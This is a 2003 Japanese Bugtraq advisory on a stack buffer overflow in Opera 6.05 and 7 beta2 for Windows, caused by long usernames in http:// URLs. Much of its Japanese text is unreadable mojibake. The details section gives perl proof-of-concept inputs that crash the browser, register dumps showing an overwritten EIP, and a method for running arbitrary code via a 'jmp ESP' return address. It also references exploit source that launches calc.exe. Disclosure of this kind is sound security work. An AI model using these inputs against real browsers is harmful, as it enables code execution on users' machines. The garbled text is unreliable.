Bugtraq in Japanese
Opera$B$K$*$1$kD9$$%f!<%6(B $B!<L>$G5/$3$k%P%C%U%!%*(B $B!<%P!<%U%m!<$K$h$k@H<e(B $B@-(B Feb 09 2003 02:41PM
nesumin (nesumin softhome net)
$B3'$5$s$3$s$K$A$O!#(B

$B$3$3$K(BOpera$B$N@H<e@-$K$D$$$F$N>pJs$r8x3+$7$^$9!#(B
$B;dC#$O$3$N@H<e@-$,Aa5^$K=$@5$5$l$k$3$H$r4j$C$F$$$^$9!#(B

_________________________________________________

----------------------------------------------------------------
$BMWLs!!!!!!!!(B: Opera$B$K$*$1$kD9$$%f!<%6!<L>$G5/$3$k%P%C%U%!(B
$B!!!!!!!!!!!!(B $B%*!<%P!<%U%m!<$K$h$k@H<e@-(B
$B@=IJ!!!!!!!!(B: Opera for Windows
$B%P!<%8%g%s!!(B: 6.05 build1140 (+ Opera7 beta2 build2577)
$B%Y%s%@!<!!!!(B: Opera Software ASA (http://www.opera.com/)
$B4m81EY!!!!!!(B: $B?<9o!#G$0U$N%P%$%J%j%3!<%I$N<B9T$,2DG=(B
$B%j%b!<%H!!!!(B: $B$O$$(B
$B%m!<%+%k!!!!(B: $B$O$$(B
$BH/8+<T!!!!!!(B: nesumin <nesumin (at) softhome (dot) net [email concealed]>
$BJs9pF|!!!!!!(B: 2003-02-02
$B8x3+F|!!!!!!(B: 2003-02-09
$B#H#T#M#LHG!!(B: http://opera.rainyblue.org/special/o6unexp.php
-------------------------------------------------------------- --

0. 製品情報

Opera$B$O(BGUI$B%Y!<%9$N(BWEB$B%V%i%&%6!<$G$9!#(B
Mail$B!"(BNews$B!"(BIM$B%/%i%$%"%s%H$rJ;$;;}$C$F$*$j!"(BWindows$B
!"(BLinux$B!"(BFreeBSD$B!"(B
$B$=$NB>$GF0:n$7$^$9!#(B

Opera Software ASA
http://www.opera.com/

1. 概要

Windows$BMQ(B Opera6.05 $B$K$OD9$$%f!<%6!<%M!<%`$r4^$`!V(Bhttp://$B!W$G(B
$B;O$^$k(BURL$B$r3+$/;~!"%9%?%C%/>e$G%P%C%U%!%*!<%P!<%U%m!<$,H/@8$9$k
(B
$B$H$$$&?<9o$J%;%-%e%j%F%#!<%[!<%k$,$"$j$^$9!#(B

$B967b<T$O%j%s%/(B($B%"%s%+!<%?%0(B)$B!"2hA|(B($B%$%a!<%8%?%0(B)
$B!"%U%l!<%`!"(B
$B%9%/%j%W%H$J$I$rMQ$$$F%P%C%U%!%*!<%P!<%U%m!<$r0z$-5/$3$9$3$H$,$G$-!"
(B
$B%9%?%C%/Fb$KJ]B8$5$l$F$$$k(BRET$B%"%I%l%9$r>e=q$-$9$k$3$H$G!"(B
$BG$0U$N%P%$%J%j%3!<%I$r<B9T$9$k$3$H$,2DG=$G$9!#(B

$B$b$7!"(BOpera$B%f!<%6!<$,0-0U$"$k:Y9)$5$l$?(BURL$B$r3+$3$&$H$9$l$
P!"(B
$B$=$l$K$h$C$F%&%#%k%9$d%H%m%$$NLZGO$X$N46@w!"%7%9%F%`GK2u!"(B
$B%M%C%H%o!<%/$X$N%G!<%?O31LEy$NHo32$KAx$&4m81@-$,$"$j$^$9!#(B

2. テストしたバージョン

Opera (Windows$BMQ(B)
Opera6.05 build 1140
Opera7 beta2 build 2577
Opera7.00 build 2637
Opera7.01 build 2651
各英語版+日本語版

Platform
Windows98SE JP
Windows2000 SP3 JP
Windows2000 XP SP1 JP

3. 脆弱性が確認できたバージョン

Opera6.05 build 1140
Opera7 beta2 build 2577

4. 当脆弱性が確認できなかったバージョン

Opera7.00 build 2637
Opera7.01 build 2651

5. ベンダーの対応

報告済み。(2003/02/02)
正式な回答がないため、ベンダーの対応状況は不明。

6. 回避方法

ベンダーによる修正までの暫定的な回避方法として、
以下の方法を提案します。

$B8@8l%U%!%$%k(B(*.lng)$BFb$N%j%=!<%9HV9f!V(B21463$B!W$NJ8;zNs$K$"$
k(B
$B#2$D$N!V(B%s$B!W$r>C5n$7$^$9!#(B
$B$3$l$K$h$j(BURL$B7Y9p%@%$%"%m%0$G$O%f!<%6!<L>$b%5!<%P!<L>$b(B
$BI=<($5$l$J$/$J$j$^$9$,!"Ev@H<e@-$r2sHr$9$k$3$H$,$G$-$^$9!#(B
($B%U%!%$%k$rJT=8$9$k:]$O%P%C%/%"%C%W$r<h$j$^$7$g$&(B)

7. 詳細

Opera$B$O%f!<%6!<%M!<%`$r4^$`!V(Bhttp://$B!W$G;O$^$k(BURL$B$r3+$3$&
$H$9$k$H!"(B
$B8@8l%U%!%$%kFb$K$"$k%j%=!<%9HV9f!V(B21463$B!W$N%U%)!<%^%C%HJ8;zNs$r
(B
$B;HMQ$7$F!"!V(BURL$B7Y9p%@%$%"%m%0!W$KI=<($9$kJ8;zNs$r@8@.$7$^$9!#(
B

$B$=$N;~!"%f!<%6!<%M!<%`$KBP$9$kD9$5%A%'%C%/$,L5$$$?$a!"(B
$BD9$$%f!<%6!<%M!<%`$r;XDj$9$k$3$H$G%9%?%C%/>e$N%m!<%+%k%P%C%U%!$G(B
$B%*!<%P!<%U%m!<$,H/@8$7$^$9!#(B(URL$BA4BN$ND9$5$K$O@)8B$,$"$j$^$9(B
)

$B$*$h$=(B 2624 $BJ8;z(B(16bit)$B$/$i$$$G(BRET$B%"%I%l%9$r>e=q$-$G$-$^$9!#(B
$B$^$?!"$=$N%*%U%;%C%HCM$O!V(B21463$B!W$NJ8;zNs$K0MB8$7$^$9!#(B

[Opera6.05 build 1140, english language file]

$ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"

---------------------------------------------------------------------
Exception C0000005
EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58 ESI=01A8A940
EDI=77DF6001 EBP=0012E278 ESP=0012CDD8 EIP=00423D68 FLAGS=00000216

0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . .
0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a.
0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A.
0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
....
0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|.
0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E.....
---------------------------------------------------------------------

$B>e5-$N>l9g$O(BRET$B%"%I%l%9$K(BEIP$B$,0\$kA0$K%"%/%;%9%P%$%*%l!<%
7%g%s$,(B
$BH/@8$7$^$9$,!">e=q$-8e$K;2>H$5$l$F$$$kNN0h$r(B0x80000001$BEy$NCM$K%
;%C%H(B
$B$7$F$*$/$3$H$K$h$j(BEIP$B$r0\$9$3$H$,$G$-$^$9!#(B

$ perl -e "exec('opera.exe','http://'.'%01%e8%80%80'x 1311 .'%ef%bb%be'x 2 .'@/')"

"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
("$BA4$F$N%"%I%l%9$r(BUTF-8$B$G%(%s%3!<%I$9$k(B" $B@_Dj$K$7$F$*$/(B)

---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001
EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------

$B$=$N;~!"(BESP$B%l%8%9%?$O(BRET$B%"%I%l%9$^$G$N%*%U%;%C%HCM!\(B0x
10$B%P%$%HJU$j$N(B
$B0LCV$r;X$7$^$9!#(B

$B=>$C$F(BRET$B%"%I%l%9$r!V(Bjmp ESP$B!WL?Na$X$N%"%I%l%9$G>e=q$-$7!"(B
ESP$B$,;X$9%"%I%l%90J8e$KG$0U$N%P%$%J%j%3!<%I$rCV$/$3$H$G(B
$B$=$N%P%$%J%j%3!<%I$r<B9T$9$k$3$H$,2DG=$G$9!#(B

Opera7.00 build 2637 以降ではこの脆弱性を確認できませんでした。

[備考]

$B$3$N@H<e@-$G%P%C%U%!$K=q$-9~$^$l$k%f!<%6!<%M!<%`$O(B
16bit$B%o%$%IJ8;z$KJQ49$5$l$?$b$N$G$9!#(B

$B!V(BURL$B$r(BUTF-8$B$G%(%s%3!<%I$7$FAw$k!W@_Dj$r%*%s$K$7$F$$$k$H
(B
UTF$BEy$G%(%s%3!<%I$7$?%f!<%6!<%M!<%`$r;XDj$7$?$H$-$K!"(B
$BMF0W$K0U?^$7$?%G!<%?$r%a%b%j>e$KE83+$9$k$3$H$,$G$-$^$9!#(B

$B5U$K!V(BURL$B$r(BUTF-8$B$G%(%s%3!<%I$7$FAw$k!W@_Dj$r%*%U$K$7$F$$$
k$H(B
$BHs>o$K:$Fq$K$J$j$^$9!#(B

8. サンプル

・検証目的以外、また自身の所有物、及びそれに準ずる物以外
での使用を禁じます。
・このサンプルを利用した結果、如何なる損害が生じても当方は
一切責任を負いません。

◇ デモンストレーション(日本語のみ)

http://opera.rainyblue.org/special/o6unexp_demo.php

$B!~(B $B%5%s%W%k(BExploit$B%=!<%9%3!<%I(B($BE:IU%U%!%$%k(Bo6unexp.c.gz$
BFb(B)

o6unexp.c

$B$3$N%=!<%9%3!<%I$OEv@H<e@-$rMxMQ$7$F!V(Bcalc.exe$B!W(B($BEEBn(B)
$B$r(B
$B<B9T$5$;$k(BHTML$B%U%!%$%k$r@8@.$9$k%W%m%0%i%`$G$9!#(B
Visual C++ 6$B$G%3%s%Q%$%k$G$-$k$3$H$r3NG'$7$F$$$^$9!#(B

9. 協力

:: Operash :: (http://opera.rainyblue.org/)

imagine (Operash webmaster)
melorin

10.連絡先、その他

nesumin <nesumin (at) softhome (dot) net [email concealed]>

当情報は内容が保証されているものではありません。
又、適時修正される可能性があります。
当情報により発生した如何なる損害も当方は一切の責任を負いません。

_________________________________________________

------------------------------------------------------
nesumin <nesumin (at) softhome (dot) net [email concealed]>
